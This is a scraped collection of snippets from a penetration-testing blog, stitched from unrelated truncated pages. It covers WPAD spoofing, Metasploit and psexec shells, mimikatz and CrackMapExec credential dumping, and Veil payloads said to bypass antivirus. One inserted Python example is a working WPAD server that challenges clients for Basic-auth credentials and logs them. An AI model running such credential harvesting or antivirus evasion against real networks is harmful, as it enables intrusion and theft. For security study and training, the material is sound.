e-spohn.com
Man-In-The-Middle « E-Spohn
http://e-spohn.com/blog/category/security/man-in-the-middle
Archive for category Man-In-The-Middle. On June 7, 2013. Here is where the dirty trick comes in. If we are on the same broadcast network as the client attempting to resolve this WPAD host, we can create a service that answers that request and claims that we are that host. Another dirty trick is to host the wpad.dat file on an HTTP server that requires basic authentication. Who doesn’t try re-entering their credentials when prompted on their corporate network, right? So, the brilliant folks at SpiderLabs.
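The HTTP half of that trick, as an added example that is not code from the E-Spohn post or from SpiderLabs' tooling: a small server that answers for wpad.dat only after an HTTP Basic challenge and records whatever the client sends back. The realm string, the PAC body and the placeholder proxy address are assumptions for the demo; the name-resolution spoofing (answering the broadcast WPAD lookup) that gets the client to this server is not shown here.

```python
"""Added example: serve wpad.dat behind HTTP Basic auth and log credentials.

Not from the original post. Realm, PAC body and addresses are assumptions.
"""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

REALM = "CORP"          # assumed realm; this is the text the browser's prompt shows
PAC_BODY = (            # assumed PAC content; 192.0.2.10 is a TEST-NET-1 placeholder
    'function FindProxyForURL(url, host) {\n'
    '    return "PROXY 192.0.2.10:8080; DIRECT";\n'
    '}\n'
)

captured = []   # (client_ip, username, password) tuples seen by the server


def parse_basic(header):
    """Decode an 'Authorization: Basic <b64>' header into (user, password).

    Returns None for a missing header, a non-Basic scheme, bad base64, or a
    payload without the mandatory ':' separator.
    """
    if not header or not header.lower().startswith("basic "):
        return None
    try:
        raw = base64.b64decode(header[6:].strip(), validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    user, sep, pwd = raw.decode("utf-8", "replace").partition(":")
    return (user, pwd) if sep else None


class WpadHandler(BaseHTTPRequestHandler):
    """Answer GET /wpad.dat: 401 challenge first, PAC file once creds arrive."""

    def do_GET(self):
        if self.path.lower() != "/wpad.dat":
            self.send_error(404)
            return
        creds = parse_basic(self.headers.get("Authorization"))
        if creds is None:
            # No (or unusable) credentials yet: challenge, and the client prompts its user.
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="%s"' % REALM)
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        captured.append((self.client_address[0],) + creds)
        body = PAC_BODY.encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/x-ns-proxy-autoconfig")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):   # keep the demo quiet
        pass


def start_server(port=0):
    """Bind on localhost (port 0 = ephemeral) and serve from a daemon thread."""
    srv = HTTPServer(("127.0.0.1", port), WpadHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(port, auth=None):
    """Fetch /wpad.dat the way a client would; returns (status, body)."""
    headers = {}
    if auth:
        token = base64.b64encode(("%s:%s" % auth).encode()).decode()
        headers["Authorization"] = "Basic " + token
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", "/wpad.dat", headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, body


def demo():
    """Run the exchange end to end with constructed credentials."""
    del captured[:]
    srv = start_server()
    port = srv.server_address[1]
    first = fetch(port)                                   # -> 401 challenge
    second = fetch(port, ("CORP\\jdoe", "Summer2013!"))   # constructed creds -> 200 + PAC
    srv.shutdown()
    srv.server_close()
    return first[0], second[0], second[1], list(captured)


if __name__ == "__main__":
    print(demo())
```

The defender's check follows from the same exchange: a client that pops a credential prompt for a plain-HTTP wpad.dat, or proxy logs showing a 401 followed by a 200 on that path, is the tell. Creating a real wpad DNS record, turning off automatic proxy detection, and disabling LLMNR/NetBIOS name resolution each remove one link in the chain.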
e-spohn.com
Remote Exploitation « E-Spohn
http://e-spohn.com/blog/category/security/remote-exploitation
Archive for category Remote Exploitation. On August 18, 2014. First, if you’re not familiar with the automation capabilities provided by the Metasploit team, HD wrote a good overview of six different ways to automate the Metasploit Framework. Also, the guys over at Offensive Security have a great intro to Meterpreter scripting. Capabilities. Since I’m horrible at Ruby scripting, I decided to take the route of a simple resource script, which does take advantage of some simple Ruby scripting. All of t...
e-spohn.com
E-Spohn
http://e-spohn.com/page/2
Dumping Clear Text Passwords. In Local Privilege Escalation. On July 6, 2012. If you haven’t heard, there’s a tool that was released a little over a year ago now, with little fanfare, that can dump all logged-on credentials in clear text. It’s called mimikatz. Is fun, but you can’t beat a good clear text password. Am I right? You can download the executable and dependent DLL from Benjamin Delpy’s (the author’s) site, as well as view a detailed explanation of how it works from his presentation at PHDays 2012. WeR...
e-spohn.com
Moar Shellz! « E-Spohn
http://e-spohn.com/blog/2014/05/12/moar-shellz
Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head: ... Impacket psexec Python script. All of these tools work and have their strengths and weaknesses. I’m going to share one more method that I recently discovered, using the Metasploit “psexec command” module, created by Royce Davis (@r3dy) from Accuvant LABS. Next, we start up Metasploit and open a listener:
e-spohn.com
Post Exploitation « E-Spohn
http://e-spohn.com/blog/category/security/post-exploitation
Archive for category Post Exploitation. On March 10, 2016. I’ve recently stumbled upon a script that has become my favorite post-exploitation tool. It’s multi-threaded, needs no local binaries, and drops no binaries on the target. It provides a plethora of functionality to escalate privileges across the network, all through WMI calls. The tool is CrackMapExec. We can also scrape clear text credentials from memory: 03-08-2016 12:41:04 PARSER 192.168.81.216:1138 PWNT WIN7-SPOONMAN$:%Xa4Qt*Qbq I3N-DdW? Notice that all ...
e-spohn.com
Powershell Reconnaissance « E-Spohn
http://e-spohn.com/blog/2014/01/22/powershell-reconnaissance
This post is a simple introduction to PowerShell and a demonstration of a couple of useful ways it can be utilized during the information gathering stages of a pentest. All of the examples are demonstrated using PowerShell version 3.0, so unless you are running Windows 8/2012 or above, you will most likely need to download the latest version from Microsoft. To check what version you are currently running, simply run the following command. Now we can simply call the “...
e-spohn.com
Reconnaissance « E-Spohn
http://e-spohn.com/blog/category/security/reconnaissance
Archive for category Reconnaissance. On January 22, 2014.
PS C:\Users\TrustedSec> $PSVersionTable
  Name                       Value
  ----                       -----
  PSVersion                  3.0
  WSManStackVersion          3.0
  SerializationVersion       1.1.0.1
  CLRVersion                 4.0.30319.18408
  BuildVersion               6.2.9200.16398
  PSCompatibleVersions       {1.0, 2.0, 3.0}
  PSRemotingProtocolVersion  2.2
PS C:\Users\TrustedSec> $cred = Get-Credential
When prompted, enter the credentials, which will be saved in the “$cred” variable. Now we can simply call the “$cred” variable when we want to q... PS C:\Use...
e-spohn.com
Metasploit Scripting « E-Spohn
http://e-spohn.com/blog/2014/08/18/metasploit-scripting
First, if you’re not familiar with the automation capabilities provided by the Metasploit team, HD wrote a good overview of six different ways to automate the Metasploit Framework. Also, the guys over at Offensive Security have a great intro to Meterpreter scripting. Here is the code: Here is a quick example, first running the “mssql ping” module to enumerate SQL servers on the network:
e-spohn.com
Spoonman1091 « E-Spohn
http://e-spohn.com/blog/author/spoonman1091
This user hasn't shared any biographical information.
WMI Post Exploitation. Thu, 10 Mar 2016, 8:22 am. Posted in Post Exploitation.
Interactive PowerShell Sessions Within Meterpreter. June 26, 2015, 9:17 am. Posted in Post Exploitation.
Account Hunting for Invoke-TokenManipulation. Posted in Post Exploitation.
Posted in Remote Exploitation.
e-spohn.com
Veil + psexec.py = pwnage « E-Spohn
http://e-spohn.com/blog/2013/06/17/veil-psexec-py-pwnage
Before I begin, please do not upload any payloads referenced in this tutorial to sites like VirusTotal. Antivirus companies use these samples to create new signatures for their products. OK, on to it. First of all, Veil: how to get it set up and running. I’ve been using Option 7 to generate payloads, which seems to bypass Microsoft Security Essentials just fine. Finally, you can use CoreLabs’ Python version of psexec (psexec.py from Impacket). First, we generate a payload: